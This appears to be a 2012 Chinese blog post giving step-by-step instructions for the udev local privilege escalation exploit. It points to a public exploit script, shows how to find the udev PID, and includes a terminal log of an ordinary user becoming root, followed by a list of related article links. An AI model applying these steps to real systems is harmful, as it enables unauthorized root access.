udev漏洞,普通用户变root
2012-07-24 16:18
225 查看
 |
|
2.下载udev.sh脚本 在http://milw0rm.com/exploits/8478
3.查看UDEV的PID
方法一:
先cat /proc/net/netlink
ffff810077587400 15 364 ffffffff 0 0 0000000000000000 2
ffff810037f81000 16 0 00000000 0 0 0000000000000000 2
ffff810077078400 18 0 00000000 0 0 0000000000000000 2
那个364就是 UDEV的进程,如果出现很多不知道哪一个用方法2
方法二:
另外最好通过ps aux | grep udev获取pid 为365,然后再-1,把这个参数传给A脚本
然后在test 用户的当前目录 里
按以下步骤运行
[haha@localhost ~]$ id
uid=501(haha) gid=502(haha) groups=502(haha)
[haha@localhost ~]$sh udev.sh 364
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.1# id
uid=0(root) gid=0(root) groups=502(haha)
此时的UID 变为0了 ,test用户已经变为 ROOT用户
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- udev漏洞,普通用户变root
- 普通用户通过udev漏洞提升到root权限
- 普通用户通过udev漏洞提升到root权限演示
- GCC编译漏洞_普通用户提权root
- su - 可以将普通用户环境变量变成root环境变量
- MySQL的root用户修改普通用户密码
- 在Ubuntu中的root用户与普通用户之间的自由切换
- ssh 通过public key 登陆,root无法登陆,普通用户可以
- (转)ubuntu中root和普通用户切换
- linux限制用户登录(ROOT及普通账户),禁止ping
- ubuntu中root用户与普通用户之间转换
- 016_把普通用户免秘钥加入root用户的几种方式
- ubantu设置root密码,解压常用的压缩包,文件夹中没有粘贴的选项,从普通用户切换到root用户,
- ubuntu linux普通用户切换到root用户
- 怎样在程序中从普通用户切换到root用户?(MAC OS X 适用)
- 普通用户vim打开文件编辑后以root保存
- 检查crontab合规,除root用户外,禁止普通用户使用crontab
- ubuntu root 或者 普通用户 的密码忘了,解决办法
- useradd umask报错 root用su 切换到普通用户提示输入密码并报密码错误
- ubuntu下root用户和普通用户的切换命令